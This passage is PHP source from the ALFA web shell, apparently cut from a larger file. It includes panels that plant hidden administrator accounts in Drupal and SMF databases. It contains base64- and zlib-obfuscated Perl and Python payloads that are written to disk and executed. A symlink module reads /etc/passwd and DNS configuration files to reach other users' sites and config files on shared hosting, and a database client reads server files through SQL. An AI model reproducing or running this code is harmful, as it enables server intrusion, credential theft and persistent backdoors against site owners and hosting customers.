            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa4'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $admin = $_POST['alfa8'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $getDescuid = @mysqli_query($conn, "select uid from users order by uid desc limit 0,1");
                $getDescuid = @mysqli_fetch_assoc($getDescuid);
                $getDescuid = $getDescuid['uid'];
                $getdescuid = $getDescuid++;
                $solevisible = @mysqli_query($conn, "insert into users (uid,name,pass,mail,signature_format,status,timezone,init) values('{$getDescuid}','{$admin}','\$S\$DP2y9AbolCBOd\\/WyQcpzu4zF57qE0noyCNeXZWv.37R66VsFjOiC','solevisible@fbi.gov','filtered_html','1','Europe/Berlin','solevisible@fbi.gov')") or die(mysqli_error($conn));
                $solevisible = @mysqli_query($conn, "select uid from users where name='" . $admin . "'") or die(mysqli_error($conn));
                $sole = mysqli_num_rows($solevisible);
                if ($sole == 1) {
                    $solevis = mysqli_fetch_assoc($solevisible);
                    $res = $solevis['uid'];
                }
                $solevisible = @mysqli_query($conn, "INSERT INTO users_roles (uid,rid) VALUES ('" . $res . "', '3')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        if (isset($_POST['alfa10']) && $_POST['alfa10'] == 'smf') {
            echo __pre() . '<center><center><div class="txtfont_header">| SMF |</div><p><p>' . getConfigHtml('smf') . '</p><form onSubmit="g(\'pwchanger\',null,\'>>\',this.localhost.value,this.database.value,null,this.username.value,this.password.value,this.prefix.value,this.admin.value,null,\'smf\'); return false;" method="POST">';
            $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name', 'inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user', 'inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw', 'inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix', 'inputName' => 'prefix', 'inputValue' => 'smf_', 'inputSize' => '50'), 'td6' => array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'), 'td7' => array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true));
            create_table($table);
            echo "<p><input value=\" \" name=\"send\" type=\"submit\"></p></form></center>";
            if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
                $localhost = $_POST['alfa2'];
                $database = $_POST['alfa3'];
                $username = $_POST['alfa5'];
                $password = $_POST['alfa6'];
                $prefix = $_POST['alfa7'];
                $admin = $_POST['alfa8'];
                $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
                $setpwAlg = sha1(strtolower($admin) . 'solevisible');
                $solevisible = @mysqli_query($conn, "insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'{$admin}','1','{$admin}','{$setpwAlg}','solevisible@fbi.gov')") or die(mysqli_error($conn));
                if ($solevisible) {
                    __alert('Success... ' . $admin . ' is created...');
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaMakePwd()
    {
        if (_alfa_file_exists("/etc/virtual/domainowners") || _alfa_file_exists("/etc/named.conf") && _alfa_file_exists("/etc/valiases")) {
            return "/home/{user}/public_html/";
        }
        $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
        $public = end($document);
        array_pop($document);
        array_pop($document);
        $path = implode("/", $document) . "/{user}/" . $public;
        return $path;
    }
    function alfaGetDomains($state = false)
    {
        $state = "named.conf";
        $lines = array();
        $lines = _alfa_file('/etc/named.conf');
        if (!$lines) {
            $lines = @scandir("/etc/valiases/");
            $state = "valiases";
            if (!$lines) {
                $lines = @scandir("/var/named");
                $state = "named";
                if (!$lines && $state) {
                    $lines = _alfa_file('/etc/passwd');
                    $state = "passwd";
                }
            }
        }
        return array("lines" => $lines, "state" => $state);
    }
    function alfaCreateParentFolder()
    {
        $parent = $GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__;
        if (!@is_dir($parent)) {
            @mkdir($parent, 0755, true);
        }
    }
    function alfasymlink()
    {
        alfahead();
        AlfaNum(9, 10);
        alfaCreateParentFolder();
        @chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
        echo "<div class=header><br><center><div class=\"txtfont_header\">| Symlink |</div><center><h3><a href=javascript:void(0) onclick=\"g('symlink',null,null,'symphp')\">| Symlink( php ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,'symperl')\">| Symlink( perl ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,'sympy')\">| Symlink( python ) | </a><a href=javascript:void(0) onclick=\"g('symlink',null,null,null,null,'SymFile')\">| File Symlink | </a></h3></center>";
        if (isset($_POST['alfa2']) && ($_POST['alfa2'] == 'symperl' || $_POST["alfa2"] == "sympy")) {
            $sympath = alfaMakePwd();
            @mkdir('cgialfa', 0755);
            @chdir('cgialfa');
            alfacgihtaccess('cgi');
            $perl = "#!/usr/bin/perl   -I/usr/local/bandmin\nuse MIME::Base64;use Compress::Zlib;my \$alfa_data=\"ALFA_DATA\";eval(Compress::Zlib::memGunzip(decode_base64(\"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\")));";
            $py = "#!/usr/bin/python\nimport zlib, base64\nalfa_data='ALFA_DATA'\neval(compile(zlib.decompress(base64.b64decode(\"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\")),'<string>','exec'))";
            $cginame = "symperl.alfa";
            $source = $perl;
            $lang = "perl";
            if ($_POST["alfa2"] == "sympy") {
                $cginame = "pysymlink.alfa";
                $source = $py;
                $lang = "python";
            }
            @__write_file($cginame, $source);
            @chmod($cginame, 0755);
            echo __pre();
            $resource = alfaEx("{$lang} {$cginame} {$sympath}", false, true, true);
            if (strlen($resource) == 0) {
                echo AlfaiFrameCreator('cgialfa/' . $cginame);
            } else {
                echo $resource;
            }
        }
        if (isset($_POST['alfa4']) && $_POST['alfa4'] == 'SymFile') {
            if (function_exists('symlink') || _alfa_can_runCommand(true, true)) {
                AlfaNum(9, 10);
                echo __pre() . '
<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
<p><input type="submit" value=" " name="symlink" /></p></form></center>';
                $path = $_POST['alfa5'];
                $symname = $_POST['alfa6'];
                $solevisible58 = $_POST['alfa7'];
                if ($solevisible58) {
                    $new_name = str_replace(".", "_", basename($symname));
                    $rand_dir = $new_name . rand(111, 9999);
                    $sym_dir = 'alfasymlinkphp/' . $rand_dir . '/';
                    @mkdir($sym_dir, 0777, true);
                    alfacgihtaccess('sym', $sym_dir, $symname);
                    _alfa_symlink("{$path}", "{$sym_dir}/{$symname}");
                    echo __pre();
                    echo "<center><b><font color=\"white\">Click >> </font><a target=\"_blank\" href=\"ALFA_DATA/" . $sym_dir . '" ><b><font size="4">' . $symname . '</font></b></a></b></center>';
                }
            } else {
                echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
            }
        }
        if (isset($_POST['alfa2']) && $_POST['alfa2'] == 'symphp') {
            $cant_symlink = true;
            if (function_exists('symlink') || _alfa_can_runCommand(false, false)) {
                @mkdir('alfasymlink', 0777);
                alfacgihtaccess('sym', 'alfasymlink/');
                _alfa_symlink('/', 'alfasymlink/root');
                $table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
                if (_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")) {
                    echo "<center>";
                    $lines = array();
                    $anony_domains = array();
                    $anonymous_users = array();
                    $f_black = array();
                    $error = false;
                    $anonymous = false;
                    $makepwd = "/home/{user}/public_html/";
                    $domains = alfaGetDomains();
                    $lines = $domains["lines"];
                    $state = $domains["state"];
                    $is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
                    $can_runcmd = _alfa_can_runCommand(false, false);
                    if (!$is_posix && !$can_runcmd) {
                        $anonymous = true;
                        $anony_domains = $domains["lines"];
                        $lines = _alfa_file('/etc/passwd');
                    }
                    echo $table_header;
                    $count = 1;
                    $template = "<tr><td><span style=\"color:#FFFF01;\">{count}</span></td><td style=\"text-align:left;\"><a target=\"_blank\" href=\"{http}\"/><span style=\"color:#00A220;margin-left:10px;\"><b>{domain}</b> </a></span></td><td style=\"text-align:left;\"><span style=\"color:#FFFFFF;margin-left:10px;\"><b>{owner}</font></b></td><td><a href=\"ALFA_DATA/alfasymlink/root{sympath}\" target=\"_blank\"><span style=\"color:#FF0000;\">Symlink</span></a></td></tr>";
                    foreach ($lines as $line) {
                        $domain = "";
                        $owner = "";
                        if ($anonymous) {
                            $explode = explode(":", $line);
                            $owner = $explode[0];
                            $owner_len = strlen($owner) - 1;
                            $userid = $explode[2];
                            if ((int) $userid < 500) {
                                continue;
                            }
                            $domain = "[?????]";
                            $temp_black = array();
                            $finded = false;
                            foreach ($anony_domains as $anony) {
                                if ($state == "named.conf") {
                                    if (@strstr($anony, 'zone')) {
                                        preg_match_all('#zone "(.*)"#', $anony, $data);
                                        $domain = $data[1][0];
                                    } else {
                                        continue;
                                    }
                                } elseif ($state == "named" || $state == "valiases") {
                                    if ($anony == "." || $anony == "..") {
                                        continue;
                                    }
                                    if ($state == "named") {
                                        $anony = rtrim($anony, ".db");
                                    }
                                    $domain = $anony;
                                }
                                $sub_domain = str_replace(array("-", "."), "", $domain);
                                if (substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)) {
                                    if (in_array($owner . $domain, $temp_black)) {
                                        continue;
                                    }
                                    $sympath = str_replace("{user}", $owner, $makepwd);
                                    $http = "http://" . $domain;
                                    echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
                                    $count++;
                                    $temp_black[] = $owner . $domain;
                                    $finded = true;
                                }
                            }
                            if (!$finded) {
                                $anonymous_users[] = $owner;
                            }
                        } else {
                            if ($state == "named.conf") {
                                if (@strstr($line, 'zone')) {
                                    preg_match_all('#zone "(.*)"#', $line, $data);
                                    $domain = $data[1][0];
                                } else {
                                    continue;
                                }
                            } elseif ($state == "named" || $state == "valiases") {
                                if ($line == "." || $line == "..") {
                                    continue;
                                }
                                if ($state == "named") {
                                    $line = rtrim($line, ".db");
                                }
                                $domain = $line;
                            }
                            if (strlen(trim($domain)) > 2 && $state != "passwd") {
                                if (!_alfa_file_exists('/etc/valiases/' . $domain, false)) {
                                    continue;
                                }
                                if ($is_posix) {
                                    $user = @posix_getpwuid(@fileowner('/etc/valiases/' . $domain));
                                    $owner = $user["name"];
                                } elseif ($can_runcmd) {
                                    $owner = alfaEx("stat -c '%U' /etc/valiases/" . $domain, false, false);
                                }
                            }
                        }
                        if (!$anonymous) {
                            if (strlen($owner) == 0 || in_array($owner . $domain, $f_black)) {
                                continue;
                            }
                            $sympath = str_replace("{user}", $owner, $makepwd);
                            $http = "http://" . $domain;
                            if ($state == "passwd") {
                                $http = "javascript:alert('we cant find domain...')";
                            }
                            echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
                            $count++;
                            $f_black[] = $owner . $domain;
                        }
                    }
                    if ($anonymous) {
                        foreach ($anonymous_users as $owner) {
                            $sympath = str_replace("{user}", $owner, $makepwd);
                            $http = "javascript:alert('we cant find domain...')";
                            echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
                            $count++;
                        }
                    }
                    $cant_symlink = false;
                } else {
                    $is_direct = false;
                    $makepwd = alfaMakePwd();
                    if (_alfa_file_exists("/etc/virtual/domainowners")) {
                        $makepwd = "/home/{user}/public_html";
                        $is_direct = true;
                    }
                    $sole = _alfa_file("/etc/virtual/domainowners");
                    $count = 1;
                    echo $table_header;
                    $template = "<tr><td><span style=\"color:#FFFF01;\">{count}</span></td><td style=\"text-align:left;\"><a target=\"_blank\" href=\"http://www.{url}\"/><span style=\"color:#00A220;margin-left:10px;\"><b>{url}</b> </a></span></td><td style=\"text-align:left;\"><span style=\"color:#FFFFFF;margin-left:10px;\"><b>{user}</font></b></td><td><a href=\"ALFA_DATA/alfasymlink/root{cwd}\" target=\"_blank\"><span style=\"color:#FF0000;\">Symlink</span></a></td></tr>";
                    if ($sole) {
                        foreach ($sole as $visible) {
                            if (@strstr($visible, ":")) {
                                $solevisible = explode(':', $visible);
                                $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
                                echo str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
                            }
                        }
                    } else {
                        $passwd = _alfa_file("/etc/passwd");
                        if ($passwd) {
                            $html = "";
                            $is_named = false;
                            $users = array();
                            $domains = array();
                            $uknowns = array();
                            foreach ($passwd as $user) {
                                $user = trim($user);
                                $expl = explode(":", $user);
                                if ((int) $expl[2] < 500) {
                                    continue;
                                }
                                $users[$expl[0]] = $expl[5];
                            }
                            $site_domains = @scandir("/etc/virtual/");
                            if (!$site_domains) {
                                $site_domains = alfaEx("ls /etc/virtual/");
                                $site_domains = explode("\n", $site_domains);
                                if (!$site_domains) {
                                    $site_domains = _alfa_file("/etc/named.conf");
                                    if ($site_domains) {
                                        $is_named = true;
                                    }
                                }
                            }
                            foreach ($site_domains as $line) {
                                if ($is_named) {
                                    if (@strstr($line, 'zone')) {
                                        preg_match_all('#zone "(.*)"#', $line, $data);
                                        $domain = $data[1][0];
                                        if (strlen($domain > 2) && !empty($domain)) {
                                            $domains[] = $domain;
                                        }
                                    }
                                } else {
                                    $domains[] = $line;
                                }
                            }
                            $x = 1;
                            foreach ($users as $user => $home) {
                                foreach ($domains as $domain) {
                                    $user_len = strlen($user) - 1;
                                    $sub_domain = str_replace(array("-", "."), "", $domain);
                                    $five_user = substr($user, 0, $user_len);
                                    $five_domain = substr($sub_domain, 0, $user_len);
                                    if ($five_user == $five_domain) {
                                        if ($is_direct) {
                                            $cwd = str_replace("{user}", $user, $makepwd);
                                        } else {
                                            $expl = explode("}/", $makepwd);
                                            $cwd = $home . "/" . $expl[1];
                                        }
                                        $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
                                    } else {
                                        $uknowns[$user] = $home;
                                    }
                                }
                            }
                            $uknowns = array_unique($uknowns);
                            foreach ($uknowns as $user => $home) {
                                if ($is_direct) {
                                    $cwd = str_replace("{user}", $user, $makepwd);
                                } else {
                                    $expl = explode("}/", $makepwd);
                                    $cwd = $home . "/" . $expl[1];
                                }
                                $html .= str_replace(array("{count}", "{user}", "{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
                            }
                            echo $html;
                        }
                    }
                    echo "</table>";
                    $cant_symlink = false;
                }
            } else {
                echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
                $cant_symlink = false;
            }
            if ($cant_symlink) {
                echo "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><font color=\"#FFFFFF\">Error...</font></b><br>";
            }
            echo "</center></table>";
        }
        echo "</div>";
        alfafooter();
    }
    function alfasql()
    {
        class DbClass
        {
            public $type;
            public $link;
            public $res;
            public $mysqli_connect_error = false;
            public $mysqli_connect_error_msg = "";
            function __construct($type)
            {
                $this->type = $type;
            }
            function connect($host, $user, $pass, $dbname)
            {
                switch ($this->type) {
                    case 'mysql':
                        if ($this->link = @mysqli_connect($host, $user, $pass, $dbname)) {
                            return true;
                        } else {
                            $this->mysqli_connect_error = true;
                            $this->mysqli_connect_error_msg = mysqli_connect_error();
                            return false;
                        }
                        break;
                    case 'pgsql':
                        $host = explode(':', $host);
                        if (!$host[1]) {
                            $host[1] = 5432;
                        }
                        if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
                            return true;
                        }
                        break;
                }
                return false;
            }
            function selectdb($db)
            {
                switch ($this->type) {
                    case 'mysql':
                        if (@mysqli_select_db($db)) {
                            return true;
                        }
                        break;
                }
                return false;
            }
            function query($str)
            {
                switch ($this->type) {
                    case 'mysql':
                        return $this->res = @mysqli_query($this->link, $str);
                    case 'pgsql':
                        return $this->res = @pg_query($this->link, $str);
                }
                return false;
            }
            function fetch()
            {
                $res = func_num_args() ? func_get_arg(0) : $this->res;
                switch ($this->type) {
                    case 'mysql':
                        return @mysqli_fetch_assoc($res);
                    case 'pgsql':
                        return @pg_fetch_assoc($res);
                }
                return false;
            }
            function listDbs()
            {
                switch ($this->type) {
                    case 'mysql':
                        return $this->query("SHOW databases");
                    case 'pgsql':
                        return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                }
                return false;
            }
            function listTables()
            {
                switch ($this->type) {
                    case 'mysql':
                        return $this->res = $this->query('SHOW TABLES');
                    case 'pgsql':
                        return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                }
                return false;
            }
            function error()
            {
                switch ($this->type) {
                    case 'mysql':
                        return @mysqli_error($this->link);
                    case 'pgsql':
                        return @pg_last_error();
                }
                return false;
            }
            function setCharset($str)
            {
                switch ($this->type) {
                    case 'mysql':
                        if (function_exists('mysql_set_charset')) {
                            return @mysqli_set_charset($this->link, $str);
                        } else {
                            $this->query('SET CHARSET ' . $str);
                        }
                        break;
                    case 'pgsql':
                        return @pg_set_client_encoding($this->link, $str);
                }
                return false;
            }
            function loadFile($str)
            {
                switch ($this->type) {
                    case 'mysql':
                        return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
                    case 'pgsql':
                        $this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '" . addslashes($str) . "';select file from solevisible;");
                        $r = array();
                        while ($i = $this->fetch()) {
                            $r[] = $i['file'];
                        }
                        $this->query('drop table solevisible');
                        return array('file' => implode("\n", $r));
                }
                return false;
            }
        }
        $db = new DbClass($_POST['type']);
        alfahead();
        $form_visibility = "table";
        if (isset($_POST['sql_host'])) {
